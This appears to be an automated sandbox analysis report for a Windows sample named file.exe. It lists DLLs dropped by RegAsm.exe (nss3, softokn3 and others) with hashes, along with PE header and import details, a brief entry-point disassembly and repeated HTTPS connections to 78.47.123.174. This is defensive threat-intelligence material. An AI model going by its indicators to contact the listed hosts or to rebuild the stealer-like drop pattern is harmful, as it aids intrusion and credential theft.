                                                                          Entropy (8bit):6.833616094889818
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):450024
                                                                          Entropy (8bit):6.673992339875127
                                                                          Encrypted:false
                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2046288
                                                                          Entropy (8bit):6.787733948558952
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):257872
                                                                          Entropy (8bit):6.727482641240852
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):80880
                                                                          Entropy (8bit):6.920480786566406
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.568806613547299
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:file.exe
                                                                          File size:364'032 bytes
                                                                          MD5:f4fb6b518e2e550467f533124e1f80f4
                                                                          SHA1:964e735dd9410e07536e46b9f50c65fed148bcd7
                                                                          SHA256:0a456f0fee171826bb44c9c2e1d5e7b95c0862b67d9dd75a843dec035224bb74
                                                                          SHA512:4a02aa8aa87dab5d6aa14da695f71aa424b95bc4437c3b8353ac355e0a73f68ded2df49e6e2ca8af6e9389745861a78a7343ab4838a6584a1108e18525d5984a
                                                                          SSDEEP:6144:+vFPlgMF6peZUqbWFROY1NiXKvtuTx5qPmOGDe+VNfyhr24L25rQXxSXQMR23M:+9PlgMFgxy2u15emOqVNL4LQriM
                                                                          TLSH:A174D051B4C0C032DA73153649E0CEB5AF3DFD704E629E5B77950FBE4F342829A21A6A
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......jL$..-J,.-J,.-J,._I-"-J,._O-.-J,._N-;-J,._K---J,.-K,u-J,..N-<-J,..I-:-J,..O-`-J,..O-/-J,..H-/-J,Rich.-J,........PE..L...U.Nf...

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40490e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x664E1555 [Wed May 22 15:55:01 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:3253afb4f76368b87a5ee602b0490ec8

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007F6A954BA9DFh
                                                                          jmp 00007F6A954BA279h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          jmp 00007F6A954BA40Fh
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007F6A954C3735h
                                                                          pop ecx
                                                                          test eax, eax
                                                                          je 00007F6A954BA411h
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007F6A954C03FEh
                                                                          pop ecx
                                                                          test eax, eax
                                                                          je 00007F6A954BA3E8h
                                                                          pop ebp
                                                                          ret
                                                                          cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                          je 00007F6A954B78A4h
                                                                          jmp 00007F6A954BACD2h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007F6A954BACE4h
                                                                          pop ecx
                                                                          pop ebp
                                                                          ret
                                                                          cmp ecx, dword ptr [00459500h]
                                                                          jne 00007F6A954BA403h
                                                                          ret
                                                                          jmp 00007F6A954BAD00h
                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                          mov dword ptr fs:[00000000h], ecx
                                                                          pop ecx
                                                                          pop edi
                                                                          pop edi
                                                                          pop esi
                                                                          pop ebx
                                                                          mov esp, ebp
                                                                          pop ebp
                                                                          push ecx
                                                                          ret
                                                                          mov ecx, dword ptr [ebp-10h]
                                                                          xor ecx, ebp
                                                                          call 00007F6A954BA3D9h
                                                                          jmp 00007F6A954BA3E2h
                                                                          push eax
                                                                          push dword ptr fs:[00000000h]
                                                                          lea eax, dword ptr [esp+0Ch]
                                                                          sub esp, dword ptr [esp+0Ch]
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [eax], ebp
                                                                          mov ebp, eax
                                                                          mov eax, dword ptr [00459500h]
                                                                          xor eax, ebp
                                                                          push eax
                                                                          push dword ptr [ebp-04h]
                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                          mov dword ptr fs:[00000000h], eax
                                                                          ret
                                                                          push eax
                                                                          push dword ptr fs:[00000000h]
                                                                          lea eax, dword ptr [esp+0Ch]
                                                                          sub esp, dword ptr [esp+0Ch]
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [eax], ebp
                                                                          mov ebp, eax
                                                                          mov eax, dword ptr [00459500h]

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2599c0x28.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000x1950.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x23fc80x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x23f080x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1d0000x140.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x1a59f0x1a6007a4be43e7798d718a3189e9c95a8873fFalse0.5830772363744076data6.599097536818977IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .bSs0x1c0000x3150x4008236d06e475da8010c7ad96cd639ab5eFalse0.6611328125data5.471102955664526IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x1d0000x90d00x92005b6271d1f096eb8bfc69e2bbcdc71c35False0.3901434075342466data4.6943578990279455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x270000x342140x33400eab33100d57aed41cd285a436b9b90e2False0.9837842987804878data7.983787706094081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .reloc0x5c0000x19500x1a0061174616804a3bfe9b5e0cb126d91722False0.7570612980769231data6.485348470519483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.dllCloseHandle, WaitForSingleObjectEx, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 22, 2024 18:27:54.694946051 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:54.694998980 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:54.695110083 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:54.701569080 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:54.701587915 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:55.345967054 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:55.346116066 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:55.548183918 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:55.548218966 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:55.549050093 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:55.549103975 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:55.553260088 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:55.594502926 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.115446091 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.115473986 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.115492105 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.115509987 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.115535975 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.115557909 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.115580082 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.172398090 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.172444105 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.172466993 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.172475100 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.172514915 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.172529936 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.189503908 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.189554930 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.189609051 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.189613104 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.189654112 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.190202951 CEST49699443192.168.2.623.197.127.21
                                                                          May 22, 2024 18:27:56.190217018 CEST4434969923.197.127.21192.168.2.6
                                                                          May 22, 2024 18:27:56.202091932 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:56.202132940 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:56.202207088 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:56.202529907 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:56.202547073 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.316816092 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.316941023 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.322082996 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.322105885 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.322566032 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.322640896 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.323054075 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.370501041 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.781857967 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.781940937 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.781970024 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.782016039 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.784400940 CEST49700443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.784423113 CEST4434970078.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.786659002 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.786684036 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:57.786750078 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.786955118 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:57.786966085 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:58.559346914 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:58.559614897 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:58.560288906 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:58.560312986 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:58.562026024 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:58.562037945 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.272097111 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.272185087 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.272208929 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.272231102 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.272387028 CEST49701443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.272401094 CEST4434970178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.274147987 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.274164915 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.274245024 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.274470091 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.274477959 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.986406088 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.986516953 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.986934900 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.986959934 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:27:59.988744974 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:27:59.988756895 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:00.673377037 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:00.673396111 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:00.673455000 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:00.673691988 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:00.673970938 CEST49702443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:00.673986912 CEST4434970278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:00.675507069 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:00.675523996 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:00.675609112 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:00.675803900 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:00.675815105 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:01.413003922 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:01.413156033 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:01.413958073 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:01.413990021 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:01.415627003 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:01.415648937 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.130875111 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.130934000 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.130956888 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.130980015 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.130997896 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.131031036 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.131037951 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.131094933 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.131098032 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.131154060 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.131542921 CEST49703443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.131555080 CEST4434970378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.133341074 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.133392096 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.133462906 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.133729935 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.133744955 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.929434061 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.929619074 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.930438995 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.930447102 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:02.932255983 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:02.932262897 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:03.635481119 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:03.635591030 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.635608912 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:03.635644913 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.635663986 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:03.635704994 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.635920048 CEST49704443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.635935068 CEST4434970478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:03.715635061 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.715668917 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:03.715755939 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.715960979 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:03.715970993 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:04.575936079 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:04.576050043 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.576909065 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.576916933 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:04.578974962 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.578994989 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:04.579020023 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.579030991 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:04.704720020 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.704762936 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:04.704823017 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.705094099 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:04.705105066 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:05.270811081 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:05.270875931 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:05.270899057 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:05.270916939 CEST4434970578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:05.270948887 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:05.270977020 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:05.271953106 CEST49705443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:05.271967888 CEST4434970578.47.123.174192.168.2.6
